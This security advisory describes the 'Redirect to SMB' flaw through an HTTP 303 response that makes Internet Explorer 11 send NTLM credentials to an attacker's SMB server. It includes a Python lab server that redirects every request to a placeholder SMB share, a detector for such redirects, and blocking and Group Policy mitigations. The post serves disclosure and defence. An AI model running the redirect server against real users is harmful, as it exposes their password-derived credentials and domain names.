Additional Attack Vector Found for “Redirect to SMB” Vulnerability

Details on new attack vectors for an 18-year-old vulnerability called “Redirect to SMB” were recently published. The vulnerability allows an attacker to redirect a Windows client to a malicious SMB server, which then captures the user's NTLM authentication. We issued a security alert on this earlier this month.

One of the new attack vectors is HTTP-based: a malicious website answers a request with an HTTP redirection status code whose Location header points at the attacker's SMB server. The status codes most commonly used for redirection are 301 and 302; however, the recently published proof of concept showed that the 307 status code can also be used to exploit the Redirect to SMB vulnerability.

The Masergy Threat Intelligence team further investigated whether other status codes could be used to exploit this vulnerability. We discovered that the “303 See Other” HTTP status code can also be used to cause Internet Explorer (tested on IE version 11) to connect to an SMB server. In our testing, Firefox 37 and Chrome 42 were unaffected by this particular attack vector.

Example of Attack Vector

As in the attack vector described by Cylance, the Location header of the redirect response is what causes the browser to connect to the malicious SMB server:


Figure 1. Attacker redirecting the browser to a malicious document with a 303 response

Figure 2, below, shows that a connection is made to the SMB server and the user's NTLM credentials are sent to it. What crosses the wire is the NTLM challenge-response, not the clear-text password, but that response is derived from the user's password hash and can be attacked offline by the server's operator. In addition to the challenge-response, exploitation of this vulnerability also leaks the user's domain name (and the username carried in the NTLM exchange) to the attacker.


Figure 2. Victim authenticating to the malicious SMB server
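The following is an added lab harness, not code from the original post or from the Cylance proof of concept. It builds the raw 303 (or 301/302/307/308) redirect response described above, serves it from a throwaway HTTP server so the behaviour can be reproduced against a test browser, and provides the check a proxy or detection engineer would run over captured responses to flag a Location header that would send a Windows client to SMB. The host 192.0.2.10 and the share path are placeholders from the TEST-NET-1 range; the server is meant for an isolated lab only.

```python
"""Redirect-to-SMB lab harness (added example; placeholders, not real infrastructure).

build_redirect()/serve() reproduce the malicious HTTP response for lab testing;
redirects_to_smb() is the detection check for responses seen at a proxy.
"""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Every status that makes a browser follow Location. 303 is the one this
# post adds to the already known 301/302/307 set; 308 is included for completeness.
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
REASONS = {301: "Moved Permanently", 302: "Found", 303: "See Other",
           307: "Temporary Redirect", 308: "Permanent Redirect"}


def build_redirect(status, location):
    """Raw HTTP/1.1 response bytes carrying the given redirect and Location."""
    return (f"HTTP/1.1 {status} {REASONS[status]}\r\n"
            f"Location: {location}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def parse_response(raw):
    """Split raw response bytes into (status code, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def smb_target(location):
    """Host a Windows client would contact over SMB for this Location, else None."""
    loc = location.strip()
    # Backslash UNC path (\\host\share\...) names a remote host directly.
    m = re.match(r"^\\\\([^\\/]+)\\", loc)
    if m:
        return m.group(1)
    # file://host/share/... with a non-empty host also resolves to \\host\share.
    # file:///C:/... has no host and stays local; //host/path in a Location
    # header is a scheme-relative HTTP(S) URL, not UNC, so neither is flagged.
    parts = urlsplit(loc)
    if parts.scheme.lower() == "file" and parts.netloc:
        return parts.netloc
    return None


def redirects_to_smb(raw):
    """Return the SMB host a redirect response points at, or None if it is benign."""
    status, headers = parse_response(raw)
    if status not in REDIRECT_STATUSES or "location" not in headers:
        return None
    return smb_target(headers["location"])


class RedirectHandler(BaseHTTPRequestHandler):
    """Answers every GET with the 303 -> SMB redirect. Isolated lab use only."""
    target = "file://192.0.2.10/share/document.docx"  # placeholder host and share

    def do_GET(self):
        self.send_response(303)
        self.send_header("Location", self.target)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):  # keep the lab console quiet
        pass


def serve(port=8080):
    """Run the lab server; point the test browser at http://<this host>:8080/."""
    HTTPServer(("0.0.0.0", port), RedirectHandler).serve_forever()


if __name__ == "__main__":
    raw = build_redirect(303, RedirectHandler.target)
    print(raw.decode("latin-1"))
    print("SMB target:", redirects_to_smb(raw))
```

To reproduce the finding, run `serve()` on a lab host, browse to it from the IE 11 test machine, and watch for the outbound TCP 445/139 connection and NTLM negotiation to the placeholder host; pointing the same browser at a 302 or 307 variant built with `build_redirect` lets you compare the codes the post discusses. The `redirects_to_smb` check is deliberately narrow: it flags only Location values that name a remote host via `file://` or a backslash UNC path, so local `file:///C:` paths and ordinary HTTP redirects are not reported.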


To reduce the risk of successful exploitation of this vulnerability we recommend the following countermeasures:
Block outbound SMB traffic: Block outbound SMB connections (TCP ports 139 and 445) from the internal network to the Internet at the perimeter. Note that this does not stop a redirect to an SMB server that is already inside the network, so it should be combined with the policy change below.
Update NTLM group policy: This attack vector can be mitigated by restricting NTLM authentication to remote servers through Group Policy (Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers), with legitimate servers listed under Network security: Restrict NTLM: Add remote server exceptions for NTLM authentication. Deploy the setting in “Audit all” mode first to find legitimate NTLM use that “Deny all” would break. See Reference One and Reference Two from Microsoft.